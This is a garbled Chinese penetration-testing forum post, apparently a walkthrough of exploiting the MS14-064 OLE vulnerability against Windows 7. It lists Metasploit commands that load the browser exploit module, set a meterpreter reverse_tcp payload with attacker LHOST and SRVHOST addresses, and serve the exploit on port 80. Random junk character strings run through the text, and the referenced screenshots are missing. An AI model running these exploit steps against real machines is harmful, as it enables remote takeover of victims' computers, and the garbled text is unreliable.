中国网络渗透测试联盟

标题: MS14-064 漏洞测试入侵win7 [打印本页]
作者: admin    时间: 2018-10-20 20:20
标题: MS14-064 漏洞测试入侵win7

+ i( O- d3 \0 H% l/ J: U 我发现msf下的exp只能针对带有powershell的机器进行攻击,我们用如下方法来搞演示 6 R0 ~) ], x8 l. ] y

) H6 u+ v( l# n. B. W) [

. d. h) B4 F: l7 b* P 开启msf执行命令use exploits/windows/browser/ms14_064_ole_code_execution如图: 1 ?- a7 X# ^8 E

2 F2 o$ e! c0 h; ]

1 o* F! x1 q! r 然后执行命令 set PAYLOAD windows/meterpreter/reverse_tcp1 d; ~" ^* ?; A, X8 P

: T" d; `1 u, G1 U# [

) {+ B, u* S7 N& o( W& I             set AllowPowershellPrompt true . V) _. J; h1 v7 S

# T+ d, L0 T/ g% n# R2 |

$ n; O F( ?5 g             Set LHOST 192.168.0.109/ J( l5 V& [) J& Z& ?7 e, U0 o

' E) U! u1 f8 m; E

7 R+ W6 B+ { O8 V) j$ k             set SRVHOST 192.168.0.109 , n! [ _" x- q0 W# b2 l: \: `

6 G4 C" A+ X- e) n* O* G

8 _9 h2 `1 {7 u; M             Set uripath share 2 X- x4 l& h2 m) U# d

+ h; b# v8 ]2 {1 t# e- V- ~9 h

2 p8 L# L9 K# u- J" ?- l             Set srvport 80) _8 Z3 j, W% t' \

# a$ T) q$ ^- w0 h# s7 d( b( D* _

9 `/ @ X4 q! [8 i- p h  % Y) A3 Y$ y0 m+ E: n7 Z1 ?) a! ?0 I

' ^; J4 Z: V V5 }0 Y: Y( F, }1 R

8 p' Y; Y0 X' H- p   6 x, y* e, q4 H, r3 U) f/ D* }

; x5 k6 d Q9 m9 b* l

. W2 }5 r7 e2 @$ m1 O  4 i+ w( `" _' R

d* z4 ^0 \- O" l# s( L/ g

* J' A: C8 _- j9 e  8 r* E3 M. A: G3 D. j1 E. E

4 }7 d3 E w9 I, b6 l6 o9 s

; h7 b$ a8 a D/ ~9 u   . _- U" g- |1 u. n P8 p; }

6 X# A9 p5 h$ N% R6 H {" ^# L

" c# v) m0 Q P( a 下面我们来访问本地地址如图: - G6 S8 o& L0 j3 L. ~2 N

, ?$ ?( O L5 N7 `" v; t+ |0 }

4 a' {, M+ P! Q# |. J+ I6 q   ' f8 f r% A+ |

! x' W2 N5 g8 |2 y$ b, e

! L/ z8 c' K( l/ I& f/ s   7 H+ c0 s) i5 p. z. F* h

# M3 m8 ?6 N( @5 c" j9 N6 h

; x. y. [, j- _+ E. S. s $ n& I; n$ B+ [: Y ]3 a





欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2